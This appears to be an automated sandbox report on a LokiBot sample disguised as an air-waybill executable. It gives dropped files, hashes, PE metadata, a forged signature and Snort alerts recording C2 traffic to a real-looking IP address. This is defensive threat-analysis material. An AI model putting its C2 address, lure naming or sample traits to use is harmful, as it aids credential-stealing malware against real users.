Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466018011526116
Encrypted:	false
SSDEEP:	6144:jIXfpi67eLPU9skLmb0b4sWSPKaJG8nAgejZMMhA2gX4WABl0uN1dwBCswSbB:0XD94sWlLZMM6YFHP+B
MD5:	522DAA6EEA48D5E2A7C6F5708226CFC9
SHA1:	7E81297EC305E3ABF91977A25DC43D0A3640AE34
SHA-256:	67808E7EDB5936179815EA92A0C384F8BE1272D8481C743813BD7A4D4C900619
SHA-512:	917479A5AC29A9EF64DFD7ECA496A9A848FD600C2FBC7CF95943367C1D2C9F46243DFFBF3741A0EEC8B3B5F142698DB664537A2CCD5D2548BFE934DF2084F5CA
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.h..................................................................................................................................................................................................................................................................................................................................................d.?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.92798924547791
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
File size:	574'472 bytes
MD5:	34730f3da822589c3b36ec7197ede429
SHA1:	666691e4d03bb9d885184e80d5ec5639ef56a886
SHA256:	deb91032be610ab0761ed5e1076877458b9adbbbf79ae250672fc1c2f5fc8d0a
SHA512:	5eba3f2ef8b28939fd81dff93ceffcd88635f99821ba67302b490644082e18389384fcf9dda98da5b93e5949f2d257274fee082c3e1ee4dede39e3486e37220a
SSDEEP:	12288:EYIPXjVIGzJReCstSBtlhZPhYriyAkwTiaM5ykR:EYIPLtailrPhYuowTiD
TLSH:	52C412924EBC5BA2ED3E27FE4020A91493F57F161622E78C3ED161E305963894B50E7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... ...............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x489fea
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC420D92E [Mon Apr 9 08:11:26 2074 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor eax, 35455354h
xor dword ptr [edi+eax*2], esi
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+4Ah], dl
push ebx
cmp byte ptr [eax+edi+34h], al
inc ebx
inc ebx
xor al, 37h
xor eax, 00000035h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89f98	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x68c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x88e00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x881b4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x88010	0x88200	108d187d26f94c979f18b31d8d9a8151	False	0.939282742194674	data	7.93845583971947	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8c000	0x68c	0x800	cff36433bfb22289b503b40f8dc6729f	False	0.36767578125	data	3.627649766927081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0xc	0x200	f8e64b3714417ec7a3016c70dfab97cd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8c090	0x3fc	data			0.4284313725490196
RT_MANIFEST	0x8c49c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/25/24-09:42:03.512691	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.4	45.77.223.48
04/25/24-09:42:19.955290	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.4	45.77.223.48
04/25/24-09:42:16.290446	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.4	45.77.223.48
04/25/24-09:43:07.780738	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.4	45.77.223.48
04/25/24-09:42:19.955290	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.4	45.77.223.48
04/25/24-09:42:03.512691	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.4	45.77.223.48
04/25/24-09:43:22.887850	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49816	80	192.168.2.4	45.77.223.48
04/25/24-09:42:02.263836	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.4	45.77.223.48
04/25/24-09:42:23.788777	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.4	45.77.223.48
04/25/24-09:42:55.953898	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.4	45.77.223.48
04/25/24-09:43:42.568421	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49829	80	192.168.2.4	45.77.223.48
04/25/24-09:43:46.244048	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49832	80	192.168.2.4	45.77.223.48
04/25/24-09:42:52.171897	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.4	45.77.223.48
04/25/24-09:42:23.788777	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.4	45.77.223.48
04/25/24-09:42:55.953898	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.4	45.77.223.48
04/25/24-09:43:26.739380	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49819	80	192.168.2.4	45.77.223.48
04/25/24-09:43:35.562440	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49826	80	192.168.2.4	45.77.223.48
04/25/24-09:42:49.681959	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.4	45.77.223.48
04/25/24-09:43:20.366841	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49814	80	192.168.2.4	45.77.223.48
04/25/24-09:43:52.470303	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49837	80	192.168.2.4	45.77.223.48
04/25/24-09:43:20.366841	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49814	80	192.168.2.4	45.77.223.48
04/25/24-09:43:46.244048	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49832	80	192.168.2.4	45.77.223.48
04/25/24-09:43:52.470303	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49837	80	192.168.2.4	45.77.223.48
04/25/24-09:42:33.541899	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.4	45.77.223.48
04/25/24-09:43:26.739380	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49819	80	192.168.2.4	45.77.223.48
04/25/24-09:42:33.541899	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49777	80	192.168.2.4	45.77.223.48
04/25/24-09:43:42.568421	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49829	80	192.168.2.4	45.77.223.48
04/25/24-09:42:11.222525	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.4	45.77.223.48
04/25/24-09:42:39.921949	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.4	45.77.223.48
04/25/24-09:43:10.231973	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.4	45.77.223.48
04/25/24-09:42:11.222525	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.4	45.77.223.48
04/25/24-09:41:58.700835	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.4	45.77.223.48
04/25/24-09:43:51.138012	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49836	80	192.168.2.4	45.77.223.48
04/25/24-09:43:04.035271	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.4	45.77.223.48
04/25/24-09:42:53.510184	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.4	45.77.223.48
04/25/24-09:42:47.218743	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.4	45.77.223.48
04/25/24-09:43:32.856501	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49824	80	192.168.2.4	45.77.223.48
04/25/24-09:43:29.212593	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49821	80	192.168.2.4	45.77.223.48
04/25/24-09:43:36.805880	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49827	80	192.168.2.4	45.77.223.48
04/25/24-09:42:42.452935	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.4	45.77.223.48
04/25/24-09:43:00.985732	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.4	45.77.223.48
04/25/24-09:42:53.510184	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.4	45.77.223.48
04/25/24-09:43:32.856501	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49824	80	192.168.2.4	45.77.223.48
04/25/24-09:43:43.798730	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49830	80	192.168.2.4	45.77.223.48
04/25/24-09:43:43.798730	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49830	80	192.168.2.4	45.77.223.48
04/25/24-09:43:57.993136	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49839	80	192.168.2.4	45.77.223.48
04/25/24-09:42:47.218743	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.4	45.77.223.48
04/25/24-09:42:22.438278	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.4	45.77.223.48
04/25/24-09:42:04.713098	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.4	45.77.223.48
04/25/24-09:42:26.688177	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.4	45.77.223.48
04/25/24-09:42:08.607822	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.4	45.77.223.48
04/25/24-09:42:26.688177	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.4	45.77.223.48
04/25/24-09:42:08.607822	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.4	45.77.223.48
04/25/24-09:43:48.680283	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49834	80	192.168.2.4	45.77.223.48
04/25/24-09:42:37.405098	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.4	45.77.223.48
04/25/24-09:42:58.404316	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.4	45.77.223.48
04/25/24-09:43:22.887850	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49816	80	192.168.2.4	45.77.223.48
04/25/24-09:43:30.405107	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49822	80	192.168.2.4	45.77.223.48
04/25/24-09:42:02.263836	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.4	45.77.223.48
04/25/24-09:42:43.818013	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.4	45.77.223.48
04/25/24-09:42:07.189244	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.4	45.77.223.48
04/25/24-09:42:13.826993	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.4	45.77.223.48
04/25/24-09:42:37.405098	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.4	45.77.223.48
04/25/24-09:43:30.405107	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49822	80	192.168.2.4	45.77.223.48
04/25/24-09:42:36.181912	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49779	80	192.168.2.4	45.77.223.48
04/25/24-09:42:36.181912	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49779	80	192.168.2.4	45.77.223.48
04/25/24-09:43:36.805880	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49827	80	192.168.2.4	45.77.223.48
04/25/24-09:42:43.818013	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.4	45.77.223.48
04/25/24-09:42:19.955290	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.4	45.77.223.48
04/25/24-09:43:11.469231	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.4	45.77.223.48
04/25/24-09:43:22.887850	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49816	80	192.168.2.4	45.77.223.48
04/25/24-09:42:55.953898	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.4	45.77.223.48
04/25/24-09:43:35.562440	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49826	80	192.168.2.4	45.77.223.48
04/25/24-09:43:49.906919	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49835	80	192.168.2.4	45.77.223.48
04/25/24-09:43:27.987761	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49820	80	192.168.2.4	45.77.223.48
04/25/24-09:43:49.906919	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49835	80	192.168.2.4	45.77.223.48
04/25/24-09:43:31.634111	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49823	80	192.168.2.4	45.77.223.48
04/25/24-09:43:27.987761	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49820	80	192.168.2.4	45.77.223.48
04/25/24-09:43:24.107780	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49817	80	192.168.2.4	45.77.223.48
04/25/24-09:43:20.366841	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49814	80	192.168.2.4	45.77.223.48
04/25/24-09:43:12.681066	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49808	80	192.168.2.4	45.77.223.48
04/25/24-09:43:24.107780	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49817	80	192.168.2.4	45.77.223.48
04/25/24-09:42:17.524612	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.4	45.77.223.48
04/25/24-09:43:52.470303	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49837	80	192.168.2.4	45.77.223.48
04/25/24-09:42:17.524612	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.4	45.77.223.48
04/25/24-09:42:48.461124	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.4	45.77.223.48
04/25/24-09:43:11.469231	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49807	80	192.168.2.4	45.77.223.48
04/25/24-09:42:54.719782	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.4	45.77.223.48
04/25/24-09:42:01.045653	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.4	45.77.223.48
04/25/24-09:43:04.035271	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49801	80	192.168.2.4	45.77.223.48
04/25/24-09:43:25.348509	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49818	80	192.168.2.4	45.77.223.48
04/25/24-09:43:51.138012	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49836	80	192.168.2.4	45.77.223.48
04/25/24-09:41:57.336379	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.4	45.77.223.48
04/25/24-09:43:04.035271	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.4	45.77.223.48
04/25/24-09:42:32.329146	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.4	45.77.223.48
04/25/24-09:42:48.461124	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.4	45.77.223.48
04/25/24-09:42:01.045653	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.4	45.77.223.48
04/25/24-09:43:51.138012	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49836	80	192.168.2.4	45.77.223.48
04/25/24-09:43:36.805880	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49827	80	192.168.2.4	45.77.223.48
04/25/24-09:43:32.856501	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49824	80	192.168.2.4	45.77.223.48
04/25/24-09:42:38.643235	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.4	45.77.223.48
04/25/24-09:42:42.452935	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.4	45.77.223.48
04/25/24-09:43:57.993136	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49839	80	192.168.2.4	45.77.223.48
04/25/24-09:42:42.452935	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.4	45.77.223.48
04/25/24-09:43:43.798730	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49830	80	192.168.2.4	45.77.223.48
04/25/24-09:42:34.955343	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.4	45.77.223.48
04/25/24-09:42:34.955343	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.4	45.77.223.48
04/25/24-09:42:15.058675	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.4	45.77.223.48
04/25/24-09:42:18.729353	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.4	45.77.223.48
04/25/24-09:42:22.438278	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.4	45.77.223.48
04/25/24-09:42:22.438278	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.4	45.77.223.48
04/25/24-09:42:31.102796	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.4	45.77.223.48
04/25/24-09:42:08.607822	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.4	45.77.223.48
04/25/24-09:42:31.102796	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.4	45.77.223.48
04/25/24-09:42:38.643235	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.4	45.77.223.48
04/25/24-09:42:26.688177	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.4	45.77.223.48
04/25/24-09:43:08.999268	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.4	45.77.223.48
04/25/24-09:43:12.681066	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49808	80	192.168.2.4	45.77.223.48
04/25/24-09:42:58.404316	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49797	80	192.168.2.4	45.77.223.48
04/25/24-09:43:16.392996	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49811	80	192.168.2.4	45.77.223.48
04/25/24-09:43:35.562440	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49826	80	192.168.2.4	45.77.223.48
04/25/24-09:42:58.404316	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.4	45.77.223.48
04/25/24-09:42:07.189244	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.4	45.77.223.48
04/25/24-09:43:15.173099	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49810	80	192.168.2.4	45.77.223.48
04/25/24-09:42:50.920365	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.4	45.77.223.48
04/25/24-09:42:13.826993	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.4	45.77.223.48
04/25/24-09:43:47.479485	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49833	80	192.168.2.4	45.77.223.48
04/25/24-09:43:57.993136	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49839	80	192.168.2.4	45.77.223.48
